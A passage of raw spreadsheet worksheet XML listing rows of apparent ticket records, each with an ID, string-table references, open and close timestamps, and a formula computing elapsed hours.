      </c>
      <c r="B1933">
        <v>10944</v>
      </c>
      <c r="C1933" t="s">
        <v>150</v>
      </c>
      <c r="D1933" t="s">
        <v>7</v>
      </c>
      <c r="E1933" s="1">
        <v>43211.693379629629</v>
      </c>
      <c r="F1933" s="1">
        <v>43211.751111111109</v>
      </c>
      <c r="G1933" t="s">
        <v>151</v>
      </c>
      <c r="H1933" t="str">
        <f>TEXT(F1933-E1933,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1934" spans="1:8" hidden="1">
      <c r="A1934" t="s">
        <v>152</v>
      </c>
      <c r="B1934">
        <v>10943</v>
      </c>
      <c r="C1934" t="s">
        <v>153</v>
      </c>
      <c r="D1934" t="s">
        <v>7</v>
      </c>
      <c r="E1934" s="1">
        <v>43211.644583333335</v>
      </c>
      <c r="F1934" s="1">
        <v>43211.690115740741</v>
      </c>
      <c r="G1934" t="s">
        <v>154</v>
      </c>
      <c r="H1934" t="str">
        <f>TEXT(F1934-E1934,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1935" spans="1:8" hidden="1">
      <c r="A1935" t="s">
        <v>155</v>
      </c>
      <c r="B1935">
        <v>10942</v>
      </c>
      <c r="C1935" t="s">
        <v>156</v>
      </c>
      <c r="D1935" t="s">
        <v>7</v>
      </c>
      <c r="E1935" s="1">
        <v>43211.619259259256</v>
      </c>
      <c r="F1935" s="1">
        <v>43216.177499999998</v>
      </c>
      <c r="G1935" t="s">
        <v>157</v>
      </c>
      <c r="H1935" t="str">
        <f>TEXT(F1935-E1935,"[h]")</f>
        <v>109</v>
      </c>
    </row>
    <row r="1936" spans="1:8">
      <c r="A1936" t="s">
        <v>158</v>
      </c>
      <c r="B1936">
        <v>10941</v>
      </c>
      <c r="C1936" t="s">
        <v>159</v>
      </c>
      <c r="D1936" t="s">
        <v>7</v>
      </c>
      <c r="E1936" s="1">
        <v>43211.574571759258</v>
      </c>
      <c r="F1936" s="1">
        <v>43730.06322916667</v>
      </c>
      <c r="G1936" t="s">
        <v>160</v>
      </c>
      <c r="H1936" t="str">
        <f>TEXT(F1936-E1936,"[h]")</f>
        <v>12443</v>
      </c>
    </row>
    <row r="1937" spans="1:8" hidden="1">
      <c r="A1937" t="s">
        <v>161</v>
      </c>
      <c r="B1937">
        <v>10938</v>
      </c>
      <c r="C1937" t="s">
        <v>162</v>
      </c>
      <c r="D1937" t="s">
        <v>7</v>
      </c>
      <c r="E1937" s="1">
        <v>43211.148425925923</v>
      </c>
      <c r="F1937" s="1">
        <v>43249.114398148151</v>
      </c>
      <c r="G1937" t="s">
        <v>163</v>
      </c>
      <c r="H1937" t="str">
        <f>TEXT(F1937-E1937,"[h]")</f>
        <v>911</v>
      </c>
    </row>
    <row r="1938" spans="1:8" hidden="1">
      <c r="B1938">
        <v>10936</v>
      </c>
      <c r="C1938" t="s">
        <v>164</v>
      </c>
      <c r="D1938" t="s">
        <v>7</v>
      </c>
      <c r="E1938" s="1">
        <v>43210.261481481481</v>
      </c>
      <c r="F1938" s="1">
        <v>43210.357627314814</v>
      </c>
      <c r="G1938" t="s">
        <v>66</v>
      </c>
      <c r="H1938" t="str">
        <f>TEXT(F1938-E1938,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1939" spans="1:8">
      <c r="A1939" t="s">
        <v>165</v>
      </c>
      <c r="B1939">
        <v>10934</v>
      </c>
      <c r="C1939" t="s">
        <v>166</v>
      </c>
      <c r="D1939" t="s">
        <v>7</v>
      </c>
      <c r="E1939" s="1">
        <v>43209.961099537039</v>
      </c>
      <c r="F1939" s="1">
        <v>43214.928622685184</v>
      </c>
      <c r="G1939" t="s">
        <v>25</v>
      </c>
      <c r="H1939" t="str">
        <f>TEXT(F1939-E1939,"[h]")</f>
        <v>119</v>
      </c>
    </row>
    <row r="1940" spans="1:8">
      <c r="A1940" t="s">
        <v>167</v>
      </c>
      <c r="B1940">
        <v>10933</v>
      </c>
      <c r="C1940" t="s">
        <v>168</v>
      </c>
      <c r="D1940" t="s">
        <v>7</v>
      </c>
      <c r="E1940" s="1">
        <v>43209.93577546296</v>
      </c>
      <c r="F1940" s="1">
        <v>43212.628981481481</v>
      </c>
      <c r="G1940" t="s">
        <v>169</v>
      </c>
      <c r="H1940" t="str">
        <f>TEXT(F1940-E1940,"[h]")</f>
        <v>64</v>
      </c>
    </row>
    <row r="1941" spans="1:8">
      <c r="A1941" t="s">
        <v>170</v>
      </c>
      <c r="B1941">
        <v>10931</v>
      </c>
      <c r="C1941" t="s">
        <v>171</v>
      </c>
      <c r="D1941" t="s">
        <v>7</v>
      </c>
      <c r="E1941" s="1">
        <v>43209.6174537037</v>
      </c>
      <c r="F1941" s="1">
        <v>43417.010289351849</v>
      </c>
      <c r="G1941" t="s">
        <v>31</v>
      </c>
      <c r="H1941" t="str">
        <f>TEXT(F1941-E1941,"[h]")</f>
        <v>4977</v>
      </c>
    </row>
    <row r="1942" spans="1:8" hidden="1">
      <c r="A1942" t="s">
        <v>172</v>
      </c>
      <c r="B1942">
        <v>10927</v>
      </c>
      <c r="C1942" t="s">
        <v>173</v>
      </c>
      <c r="D1942" t="s">
        <v>7</v>
      </c>
      <c r="E1942" s="1">
        <v>43208.338425925926</v>
      </c>
      <c r="F1942" s="1">
        <v>43208.758020833331</v>
      </c>
      <c r="G1942" t="s">
        <v>174</v>
      </c>
      <c r="H1942" t="str">
        <f>TEXT(F1942-E1942,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1943" spans="1:8" hidden="1">
      <c r="B1943">
        <v>10925</v>
      </c>
      <c r="C1943" t="s">
        <v>175</v>
      </c>
      <c r="D1943" t="s">
        <v>7</v>
      </c>
      <c r="E1943" s="1">
        <v>43208.158194444448</v>
      </c>
      <c r="F1943" s="1">
        <v>43208.889988425923</v>
      </c>
      <c r="G1943" t="s">
        <v>51</v>
      </c>
      <c r="H1943" t="str">
        <f>TEXT(F1943-E1943,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="1944" spans="1:8" hidden="1">
      <c r="A1944" t="s">
        <v>176</v>
      </c>
      <c r="B1944">
        <v>10921</v>
      </c>
      <c r="C1944" t="s">
        <v>177</v>
      </c>
      <c r="D1944" t="s">
        <v>7</v>
      </c>
      <c r="E1944" s="1">
        <v>43207.581967592596</v>
      </c>
      <c r="F1944" s="1">
        <v>43210.771898148145</v>
      </c>
      <c r="G1944" t="s">
        <v>66</v>
      </c>
      <c r="H1944" t="str">
        <f>TEXT(F1944-E1944,"[h]")</f>
        <v>76</v>
      </c>
    </row>
    <row r="1945" spans="1:8" hidden="1">
      <c r="A1945" t="s">
        <v>178</v>
      </c>
      <c r="B1945">
        <v>10920</v>
      </c>
      <c r="C1945" t="s">
        <v>179</v>
      </c>
      <c r="D1945" t="s">
        <v>7</v>
      </c>
      <c r="E1945" s="1">
        <v>43207.377569444441</v>
      </c>
      <c r="F1945" s="1">
        <v>43207.629699074074</v>
      </c>
      <c r="G1945" t="s">
        <v>138</v>
      </c>
      <c r="H1945" t="str">
        <f>TEXT(F1945-E1945,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1946" spans="1:8">
      <c r="A1946" t="s">
        <v>180</v>
      </c>
      <c r="B1946">
        <v>10919</v>
      </c>
      <c r="C1946" t="s">
        <v>181</v>
      </c>
      <c r="D1946" t="s">
        <v>7</v>
      </c>
      <c r="E1946" s="1">
        <v>43207.293773148151</v>
      </c>
      <c r="F1946" s="1">
        <v>43216.658541666664</v>
      </c>
      <c r="G1946" t="s">
        <v>16</v>
      </c>
      <c r="H1946" t="str">
        <f>TEXT(F1946-E1946,"[h]")</f>
        <v>224</v>
      </c>
    </row>
    <row r="1947" spans="1:8">
      <c r="A1947" t="s">
        <v>182</v>
      </c>
      <c r="B1947">
        <v>10918</v>
      </c>
      <c r="C1947" t="s">
        <v>183</v>
      </c>
      <c r="D1947" t="s">
        <v>7</v>
      </c>
      <c r="E1947" s="1">
        <v>43207.126516203702</v>
      </c>
      <c r="F1947" s="1">
        <v>43216.508692129632</v>
      </c>
      <c r="G1947" t="s">
        <v>184</v>
      </c>
      <c r="H1947" t="str">
        <f>TEXT(F1947-E1947,"[h]")</f>
        <v>225</v>
      </c>
    </row>
    <row r="1948" spans="1:8">
      <c r="A1948" t="s">
        <v>124</v>
      </c>
      <c r="B1948">
        <v>10916</v>
      </c>
      <c r="C1948" t="s">
        <v>125</v>
      </c>
      <c r="D1948" t="s">
        <v>7</v>
      </c>
      <c r="E1948" s="1">
        <v>43206.55023148148</v>
      </c>
      <c r="F1948" s="1">
        <v>43206.889351851853</v>
      </c>
      <c r="G1948" t="s">
        <v>126</v>
      </c>
      <c r="H1948" t="str">
        <f>TEXT(F1948-E1948,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1949" spans="1:8" hidden="1">
      <c r="A1949" t="s">
        <v>185</v>
      </c>
      <c r="B1949">
        <v>10915</v>
      </c>
      <c r="C1949" t="s">
        <v>186</v>
      </c>
      <c r="D1949" t="s">
        <v>7</v>
      </c>
      <c r="E1949" s="1">
        <v>43206.502268518518</v>
      </c>
      <c r="F1949" s="1">
        <v>43343.675381944442</v>
      </c>
      <c r="G1949" t="s">
        <v>28</v>
      </c>
      <c r="H1949" t="str">
        <f>TEXT(F1949-E1949,"[h]")</f>
        <v>3292</v>
      </c>
    </row>
    <row r="1950" spans="1:8">
      <c r="A1950" t="s">
        <v>187</v>
      </c>
      <c r="B1950">
        <v>10912</v>
      </c>
      <c r="C1950" t="s">
        <v>188</v>
      </c>
      <c r="D1950" t="s">
        <v>7</v>
      </c>
      <c r="E1950" s="1">
        <v>43206.106666666667</v>
      </c>
      <c r="F1950" s="1">
        <v>43538.759502314817</v>
      </c>
      <c r="G1950" t="s">
        <v>189</v>
      </c>
      <c r="H1950" t="str">
        <f>TEXT(F1950-E1950,"[h]")</f>
        <v>7983</v>
      </c>
    </row>
    <row r="1951" spans="1:8">
      <c r="A1951" t="s">
        <v>190</v>
      </c>
      <c r="B1951">
        <v>10911</v>
      </c>
      <c r="C1951" t="s">
        <v>191</v>
      </c>
      <c r="D1951" t="s">
        <v>7</v>
      </c>
      <c r="E1951" s="1">
        <v>43206.092453703706</v>
      </c>
      <c r="F1951" s="1">
        <v>43215.713275462964</v>
      </c>
      <c r="G1951" t="s">
        <v>16</v>
      </c>
      <c r="H1951" t="str">
        <f>TEXT(F1951-E1951,"[h]")</f>
        <v>230</v>
      </c>
    </row>
    <row r="1952" spans="1:8" hidden="1">
      <c r="A1952" t="s">
        <v>192</v>
      </c>
      <c r="B1952">
        <v>10910</v>
      </c>
      <c r="C1952" t="s">
        <v>193</v>
      </c>
      <c r="D1952" t="s">
        <v>7</v>
      </c>
      <c r="E1952" s="1">
        <v>43205.95113425926</v>
      </c>
      <c r="F1952" s="1">
        <v>43481.373645833337</v>
      </c>
      <c r="G1952" t="s">
        <v>194</v>
      </c>
      <c r="H1952" t="str">
        <f>TEXT(F1952-E1952,"[h]")</f>
        <v>6610</v>
      </c>
    </row>
    <row r="1953" spans="1:8" hidden="1">
      <c r="A1953" t="s">
        <v>195</v>
      </c>
      <c r="B1953">
        <v>10907</v>
      </c>
      <c r="C1953" t="s">
        <v>196</v>
      </c>
      <c r="D1953" t="s">
        <v>7</v>
      </c>
      <c r="E1953" s="1">
        <v>43205.395891203705</v>
      </c>
      <c r="F1953" s="1">
        <v>43205.816712962966</v>
      </c>
      <c r="G1953" t="s">
        <v>55</v>
      </c>
      <c r="H1953" t="str">
        <f>TEXT(F1953-E1953,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1954" spans="1:8" hidden="1">
      <c r="A1954" t="s">
        <v>197</v>
      </c>
      <c r="B1954">
        <v>10906</v>
      </c>
      <c r="C1954" t="s">
        <v>198</v>
      </c>
      <c r="D1954" t="s">
        <v>7</v>
      </c>
      <c r="E1954" s="1">
        <v>43205.14949074074</v>
      </c>
      <c r="F1954" s="1">
        <v>43320.013958333337</v>
      </c>
      <c r="G1954" t="s">
        <v>118</v>
      </c>
      <c r="H1954" t="str">
        <f>TEXT(F1954-E1954,"[h]")</f>
        <v>2756</v>
      </c>
    </row>
    <row r="1955" spans="1:8" hidden="1">
      <c r="A1955" t="s">
        <v>199</v>
      </c>
      <c r="B1955">
        <v>10905</v>
      </c>
      <c r="C1955" t="s">
        <v>200</v>
      </c>
      <c r="D1955" t="s">
        <v>7</v>
      </c>
      <c r="E1955" s="1">
        <v>43203.805787037039</v>
      </c>
      <c r="F1955" s="1">
        <v>43203.919768518521</v>
      </c>
      <c r="G1955" t="s">
        <v>201</v>
      </c>
      <c r="H1955" t="str">
        <f>TEXT(F1955-E1955,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1956" spans="1:8" hidden="1">
      <c r="A1956" t="s">
        <v>202</v>
      </c>
      <c r="B1956">
        <v>10903</v>
      </c>
      <c r="C1956" t="s">
        <v>203</v>
      </c>
      <c r="D1956" t="s">
        <v>7</v>
      </c>
      <c r="E1956" s="1">
        <v>43203.636736111112</v>
      </c>
      <c r="F1956" s="1">
        <v>43205.795891203707</v>
      </c>
      <c r="G1956" t="s">
        <v>204</v>
      </c>
      <c r="H1956" t="str">
        <f>TEXT(F1956-E1956,"[h]")</f>
        <v>51</v>
      </c>
    </row>
    <row r="1957" spans="1:8" hidden="1">
      <c r="A1957" t="s">
        <v>205</v>
      </c>
      <c r="B1957">
        <v>10902</v>
      </c>
      <c r="C1957" t="s">
        <v>206</v>
      </c>
      <c r="D1957" t="s">
        <v>7</v>
      </c>
      <c r="E1957" s="1">
        <v>43203.624641203707</v>
      </c>
      <c r="F1957" s="1">
        <v>43205.795891203707</v>
      </c>
      <c r="G1957" t="s">
        <v>207</v>
      </c>
      <c r="H1957" t="str">
        <f>TEXT(F1957-E1957,"[h]")</f>
        <v>52</v>
      </c>
    </row>
    <row r="1958" spans="1:8" hidden="1">
      <c r="A1958" t="s">
        <v>208</v>
      </c>
      <c r="B1958">
        <v>10901</v>
      </c>
      <c r="C1958" t="s">
        <v>209</v>
      </c>
      <c r="D1958" t="s">
        <v>7</v>
      </c>
      <c r="E1958" s="1">
        <v>43203.529895833337</v>
      </c>
      <c r="F1958" s="1">
        <v>43203.920902777776</v>
      </c>
      <c r="G1958" t="s">
        <v>204</v>
      </c>
      <c r="H1958" t="str">
        <f>TEXT(F1958-E1958,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1959" spans="1:8">
      <c r="A1959" t="s">
        <v>212</v>
      </c>
      <c r="B1959">
        <v>10899</v>
      </c>
      <c r="C1959" t="s">
        <v>213</v>
      </c>
      <c r="D1959" t="s">
        <v>7</v>
      </c>
      <c r="E1959" s="1">
        <v>43203.310682870368</v>
      </c>
      <c r="F1959" s="1">
        <v>43215.713275462964</v>
      </c>
      <c r="G1959" t="s">
        <v>214</v>
      </c>
      <c r="H1959" t="str">
        <f>TEXT(F1959-E1959,"[h]")</f>
        <v>297</v>
      </c>
    </row>
    <row r="1960" spans="1:8" hidden="1">
      <c r="A1960" t="s">
        <v>215</v>
      </c>
      <c r="B1960">
        <v>10898</v>
      </c>
      <c r="C1960" t="s">
        <v>216</v>
      </c>
      <c r="D1960" t="s">
        <v>7</v>
      </c>
      <c r="E1960" s="1">
        <v>43202.854363425926</v>
      </c>
      <c r="F1960" s="1">
        <v>43248.735266203701</v>
      </c>
      <c r="G1960" t="s">
        <v>37</v>
      </c>
      <c r="H1960" t="str">
        <f>TEXT(F1960-E1960,"[h]")</f>
        <v>1101</v>
      </c>
    </row>
    <row r="1961" spans="1:8" hidden="1">
      <c r="A1961" t="s">
        <v>217</v>
      </c>
      <c r="B1961">
        <v>10896</v>
      </c>
      <c r="C1961" t="s">
        <v>218</v>
      </c>
      <c r="D1961" t="s">
        <v>7</v>
      </c>
      <c r="E1961" s="1">
        <v>43202.778437499997</v>
      </c>
      <c r="F1961" s="1">
        <v>43320.837152777778</v>
      </c>
      <c r="G1961" t="s">
        <v>219</v>
      </c>
      <c r="H1961" t="str">
        <f>TEXT(F1961-E1961,"[h]")</f>
        <v>2833</v>
      </c>
    </row>
    <row r="1962" spans="1:8" hidden="1">
      <c r="A1962" t="s">
        <v>220</v>
      </c>
      <c r="B1962">
        <v>10892</v>
      </c>
      <c r="C1962" t="s">
        <v>221</v>
      </c>
      <c r="D1962" t="s">
        <v>7</v>
      </c>
      <c r="E1962" s="1">
        <v>43202.59447916667</v>
      </c>
      <c r="F1962" s="1">
        <v>43202.678599537037</v>
      </c>
      <c r="G1962" t="s">
        <v>222</v>
      </c>
      <c r="H1962" t="str">
        <f>TEXT(F1962-E1962,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1963" spans="1:8" hidden="1">
      <c r="A1963" t="s">
        <v>223</v>
      </c>
      <c r="B1963">
        <v>10891</v>
      </c>
      <c r="C1963" t="s">
        <v>224</v>
      </c>
      <c r="D1963" t="s">
        <v>7</v>
      </c>
      <c r="E1963" s="1">
        <v>43202.312106481484</v>
      </c>
      <c r="F1963" s="1">
        <v>43212.129155092596</v>
      </c>
      <c r="G1963" t="s">
        <v>225</v>
      </c>
      <c r="H1963" t="str">
        <f>TEXT(F1963-E1963,"[h]")</f>
        <v>235</v>
      </c>
    </row>
    <row r="1964" spans="1:8" hidden="1">
      <c r="A1964" t="s">
        <v>226</v>
      </c>
      <c r="B1964">
        <v>10890</v>
      </c>
      <c r="C1964" t="s">
        <v>227</v>
      </c>
      <c r="D1964" t="s">
        <v>7</v>
      </c>
      <c r="E1964" s="1">
        <v>43202.288356481484</v>
      </c>
      <c r="F1964" s="1">
        <v>43210.748113425929</v>
      </c>
      <c r="G1964" t="s">
        <v>163</v>
      </c>
      <c r="H1964" t="str">
        <f>TEXT(F1964-E1964,"[h]")</f>
        <v>203</v>
      </c>
    </row>
    <row r="1965" spans="1:8" hidden="1">
      <c r="A1965" t="s">
        <v>228</v>
      </c>
      <c r="B1965">
        <v>10888</v>
      </c>
      <c r="C1965" t="s">
        <v>229</v>
      </c>
      <c r="D1965" t="s">
        <v>7</v>
      </c>
      <c r="E1965" s="1">
        <v>43201.84652777778</v>
      </c>
      <c r="F1965" s="1">
        <v>43202.043935185182</v>
      </c>
      <c r="G1965" t="s">
        <v>230</v>
      </c>
      <c r="H1965" t="str">
        <f>TEXT(F1965-E1965,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1966" spans="1:8" hidden="1">
      <c r="A1966" t="s">
        <v>231</v>
      </c>
      <c r="B1966">
        <v>10886</v>
      </c>
      <c r="C1966" t="s">
        <v>232</v>
      </c>
      <c r="D1966" t="s">
        <v>7</v>
      </c>
      <c r="E1966" s="1">
        <v>43201.465613425928</v>
      </c>
      <c r="F1966" s="1">
        <v>43203.921400462961</v>
      </c>
      <c r="G1966" t="s">
        <v>204</v>
      </c>
      <c r="H1966" t="str">
        <f>TEXT(F1966-E1966,"[h]")</f>
        <v>58</v>
      </c>
    </row>
    <row r="1967" spans="1:8" hidden="1">
      <c r="A1967" t="s">
        <v>233</v>
      </c>
      <c r="B1967">
        <v>10885</v>
      </c>
      <c r="C1967" t="s">
        <v>234</v>
      </c>
      <c r="D1967" t="s">
        <v>7</v>
      </c>
      <c r="E1967" s="1">
        <v>43201.409525462965</v>
      </c>
      <c r="F1967" s="1">
        <v>43201.687534722223</v>
      </c>
      <c r="G1967" t="s">
        <v>55</v>
      </c>
      <c r="H1967" t="str">
        <f>TEXT(F1967-E1967,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1968" spans="1:8" hidden="1">
      <c r="A1968" t="s">
        <v>235</v>
      </c>
      <c r="B1968">
        <v>10883</v>
      </c>
      <c r="C1968" t="s">
        <v>236</v>
      </c>
      <c r="D1968" t="s">
        <v>7</v>
      </c>
      <c r="E1968" s="1">
        <v>43201.357037037036</v>
      </c>
      <c r="F1968" s="1">
        <v>43215.070775462962</v>
      </c>
      <c r="G1968" t="s">
        <v>204</v>
      </c>
      <c r="H1968" t="str">
        <f>TEXT(F1968-E1968,"[h]")</f>
        <v>329</v>
      </c>
    </row>
    <row r="1969" spans="1:8">
      <c r="A1969" t="s">
        <v>237</v>
      </c>
      <c r="B1969">
        <v>10882</v>
      </c>
      <c r="C1969" t="s">
        <v>238</v>
      </c>
      <c r="D1969" t="s">
        <v>7</v>
      </c>
      <c r="E1969" s="1">
        <v>43201.356805555559</v>
      </c>
      <c r="F1969" s="1">
        <v>43215.030312499999</v>
      </c>
      <c r="G1969" t="s">
        <v>16</v>
      </c>
      <c r="H1969" t="str">
        <f>TEXT(F1969-E1969,"[h]")</f>
        <v>328</v>
      </c>
    </row>
    <row r="1970" spans="1:8" hidden="1">
      <c r="A1970" t="s">
        <v>239</v>
      </c>
      <c r="B1970">
        <v>10881</v>
      </c>
      <c r="C1970" t="s">
        <v>240</v>
      </c>
      <c r="D1970" t="s">
        <v>7</v>
      </c>
      <c r="E1970" s="1">
        <v>43201.2421875</v>
      </c>
      <c r="F1970" s="1">
        <v>43205.816712962966</v>
      </c>
      <c r="G1970" t="s">
        <v>241</v>
      </c>
      <c r="H1970" t="str">
        <f>TEXT(F1970-E1970,"[h]")</f>
        <v>109</v>
      </c>
    </row>
    <row r="1971" spans="1:8" hidden="1">
      <c r="A1971" t="s">
        <v>242</v>
      </c>
      <c r="B1971">
        <v>10880</v>
      </c>
      <c r="C1971" t="s">
        <v>243</v>
      </c>
      <c r="D1971" t="s">
        <v>7</v>
      </c>
      <c r="E1971" s="1">
        <v>43200.860960648148</v>
      </c>
      <c r="F1971" s="1">
        <v>43220.353148148148</v>
      </c>
      <c r="G1971" t="s">
        <v>51</v>
      </c>
      <c r="H1971" t="str">
        <f>TEXT(F1971-E1971,"[h]")</f>
        <v>467</v>
      </c>
    </row>
    <row r="1972" spans="1:8" hidden="1">
      <c r="A1972" t="s">
        <v>244</v>
      </c>
      <c r="B1972">
        <v>10879</v>
      </c>
      <c r="C1972" t="s">
        <v>245</v>
      </c>
      <c r="D1972" t="s">
        <v>7</v>
      </c>
      <c r="E1972" s="1">
        <v>43200.800868055558</v>
      </c>
      <c r="F1972" s="1">
        <v>43202.090439814812</v>
      </c>
      <c r="G1972" t="s">
        <v>37</v>
      </c>
      <c r="H1972" t="str">
        <f>TEXT(F1972-E1972,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1973" spans="1:8" hidden="1">
      <c r="A1973" t="s">
        <v>210</v>
      </c>
      <c r="B1973">
        <v>10878</v>
      </c>
      <c r="C1973" t="s">
        <v>211</v>
      </c>
      <c r="D1973" t="s">
        <v>7</v>
      </c>
      <c r="E1973" s="1">
        <v>43200.78496527778</v>
      </c>
      <c r="F1973" s="1">
        <v>43206.781759259262</v>
      </c>
      <c r="G1973" t="s">
        <v>90</v>
      </c>
      <c r="H1973" t="str">
        <f>TEXT(F1973-E1973,"[h]")</f>
        <v>143</v>
      </c>
    </row>
    <row r="1974" spans="1:8" hidden="1">
      <c r="A1974" t="s">
        <v>246</v>
      </c>
      <c r="B1974">
        <v>10877</v>
      </c>
      <c r="C1974" t="s">
        <v>247</v>
      </c>
      <c r="D1974" t="s">
        <v>7</v>
      </c>
      <c r="E1974" s="1">
        <v>43200.741180555553</v>
      </c>
      <c r="F1974" s="1">
        <v>43723.165173611109</v>
      </c>
      <c r="G1974" t="s">
        <v>248</v>
      </c>
      <c r="H1974" t="str">
        <f>TEXT(F1974-E1974,"[h]")</f>
        <v>12538</v>
      </c>
    </row>
    <row r="1975" spans="1:8" hidden="1">
      <c r="A1975" t="s">
        <v>249</v>
      </c>
      <c r="B1975">
        <v>10876</v>
      </c>
      <c r="C1975" t="s">
        <v>250</v>
      </c>
      <c r="D1975" t="s">
        <v>7</v>
      </c>
      <c r="E1975" s="1">
        <v>43200.666921296295</v>
      </c>
      <c r="F1975" s="1">
        <v>43200.713495370372</v>
      </c>
      <c r="G1975" t="s">
        <v>251</v>
      </c>
      <c r="H1975" t="str">
        <f>TEXT(F1975-E1975,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1976" spans="1:8">
      <c r="A1976" t="s">
        <v>252</v>
      </c>
      <c r="B1976">
        <v>10875</v>
      </c>
      <c r="C1976" t="s">
        <v>253</v>
      </c>
      <c r="D1976" t="s">
        <v>7</v>
      </c>
      <c r="E1976" s="1">
        <v>43200.456192129626</v>
      </c>
      <c r="F1976" s="1">
        <v>43205.826273148145</v>
      </c>
      <c r="G1976" t="s">
        <v>31</v>
      </c>
      <c r="H1976" t="str">
        <f>TEXT(F1976-E1976,"[h]")</f>
        <v>128</v>
      </c>
    </row>
    <row r="1977" spans="1:8" hidden="1">
      <c r="B1977">
        <v>10874</v>
      </c>
      <c r="C1977" t="s">
        <v>254</v>
      </c>
      <c r="D1977" t="s">
        <v>7</v>
      </c>
      <c r="E1977" s="1">
        <v>43200.383668981478</v>
      </c>
      <c r="F1977" s="1">
        <v>43200.521527777775</v>
      </c>
      <c r="G1977" t="s">
        <v>255</v>
      </c>
      <c r="H1977" t="str">
        <f>TEXT(F1977-E1977,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1978" spans="1:8" hidden="1">
      <c r="A1978" t="s">
        <v>256</v>
      </c>
      <c r="B1978">
        <v>10872</v>
      </c>
      <c r="C1978" t="s">
        <v>257</v>
      </c>
      <c r="D1978" t="s">
        <v>7</v>
      </c>
      <c r="E1978" s="1">
        <v>43200.352210648147</v>
      </c>
      <c r="F1978" s="1">
        <v>43207.893483796295</v>
      </c>
      <c r="G1978" t="s">
        <v>258</v>
      </c>
      <c r="H1978" t="str">
        <f>TEXT(F1978-E1978,"[h]")</f>
        <v>180</v>
      </c>
    </row>
    <row r="1979" spans="1:8" hidden="1">
      <c r="A1979" t="s">
        <v>259</v>
      </c>
      <c r="B1979">
        <v>10871</v>
      </c>
      <c r="C1979" t="s">
        <v>260</v>
      </c>
      <c r="D1979" t="s">
        <v>7</v>
      </c>
      <c r="E1979" s="1">
        <v>43200.307222222225</v>
      </c>
      <c r="F1979" s="1">
        <v>43215.72519675926</v>
      </c>
      <c r="G1979" t="s">
        <v>43</v>
      </c>
      <c r="H1979" t="str">
        <f>TEXT(F1979-E1979,"[h]")</f>
        <v>370</v>
      </c>
    </row>
    <row r="1980" spans="1:8">
      <c r="A1980" t="s">
        <v>261</v>
      </c>
      <c r="B1980">
        <v>10870</v>
      </c>
      <c r="C1980" t="s">
        <v>262</v>
      </c>
      <c r="D1980" t="s">
        <v>7</v>
      </c>
      <c r="E1980" s="1">
        <v>43200.167303240742</v>
      </c>
      <c r="F1980" s="1">
        <v>43205.984606481485</v>
      </c>
      <c r="G1980" t="s">
        <v>25</v>
      </c>
      <c r="H1980" t="str">
        <f>TEXT(F1980-E1980,"[h]")</f>
        <v>139</v>
      </c>
    </row>
    <row r="1981" spans="1:8">
      <c r="B1981">
        <v>10869</v>
      </c>
      <c r="C1981" t="s">
        <v>122</v>
      </c>
      <c r="D1981" t="s">
        <v>7</v>
      </c>
      <c r="E1981" s="1">
        <v>43199.951053240744</v>
      </c>
      <c r="F1981" s="1">
        <v>43200.110567129632</v>
      </c>
      <c r="G1981" t="s">
        <v>123</v>
      </c>
      <c r="H1981" t="str">
        <f>TEXT(F1981-E1981,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1982" spans="1:8" hidden="1">
      <c r="A1982" t="s">
        <v>263</v>
      </c>
      <c r="B1982">
        <v>10867</v>
      </c>
      <c r="C1982" t="s">
        <v>264</v>
      </c>
      <c r="D1982" t="s">
        <v>7</v>
      </c>
      <c r="E1982" s="1">
        <v>43199.813923611109</v>
      </c>
      <c r="F1982" s="1">
        <v>43204.889062499999</v>
      </c>
      <c r="G1982" t="s">
        <v>66</v>
      </c>
      <c r="H1982" t="str">
        <f>TEXT(F1982-E1982,"[h]")</f>
        <v>121</v>
      </c>
    </row>
    <row r="1983" spans="1:8" hidden="1">
      <c r="A1983" t="s">
        <v>265</v>
      </c>
      <c r="B1983">
        <v>10864</v>
      </c>
      <c r="C1983" t="s">
        <v>266</v>
      </c>
      <c r="D1983" t="s">
        <v>7</v>
      </c>
      <c r="E1983" s="1">
        <v>43199.221574074072</v>
      </c>
      <c r="F1983" s="1">
        <v>43234.611296296294</v>
      </c>
      <c r="G1983" t="s">
        <v>267</v>
      </c>
      <c r="H1983" t="str">
        <f>TEXT(F1983-E1983,"[h]")</f>
        <v>849</v>
      </c>
    </row>
    <row r="1984" spans="1:8" hidden="1">
      <c r="A1984" t="s">
        <v>268</v>
      </c>
      <c r="B1984">
        <v>10863</v>
      </c>
      <c r="C1984" t="s">
        <v>269</v>
      </c>
      <c r="D1984" t="s">
        <v>7</v>
      </c>
      <c r="E1984" s="1">
        <v>43199.211909722224</v>
      </c>
      <c r="F1984" s="1">
        <v>43199.617476851854</v>
      </c>
      <c r="G1984" t="s">
        <v>43</v>
      </c>
      <c r="H1984" t="str">
        <f>TEXT(F1984-E1984,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1985" spans="1:8">
      <c r="A1985" t="s">
        <v>270</v>
      </c>
      <c r="B1985">
        <v>10862</v>
      </c>
      <c r="C1985" t="s">
        <v>271</v>
      </c>
      <c r="D1985" t="s">
        <v>7</v>
      </c>
      <c r="E1985" s="1">
        <v>43199.19908564815</v>
      </c>
      <c r="F1985" s="1">
        <v>43199.610300925924</v>
      </c>
      <c r="G1985" t="s">
        <v>98</v>
      </c>
      <c r="H1985" t="str">
        <f>TEXT(F1985-E1985,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1986" spans="1:8">
      <c r="A1986" t="s">
        <v>119</v>
      </c>
      <c r="B1986">
        <v>10860</v>
      </c>
